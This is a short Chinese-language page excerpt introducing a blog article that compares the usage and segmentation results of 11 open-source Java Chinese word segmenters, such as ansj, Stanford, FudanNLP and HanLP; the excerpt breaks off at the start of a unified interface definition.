  • 11大Java开源中文分词器的使用方法和分词效果对比 yangshangchuan word分词器ansj分词器Stanford分词器FudanNLP分词器HanLP分词器
    本文的目标有两个: 1、学会使用11大Java开源中文分词器 2、对比分析11大Java开源中文分词器的分词效果 本文给出了11大Java开源中文分词的使用方法以及分词结果对比代码,至于效果哪个好,那要用的人结合自己的应用场景自己来判断。 11大Java开源中文分词器,不同的分词器有不同的用法,定义的接口也不一样,我们先定义一个统一的接口: /** * 获取文本的所有分词结果, 对比
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他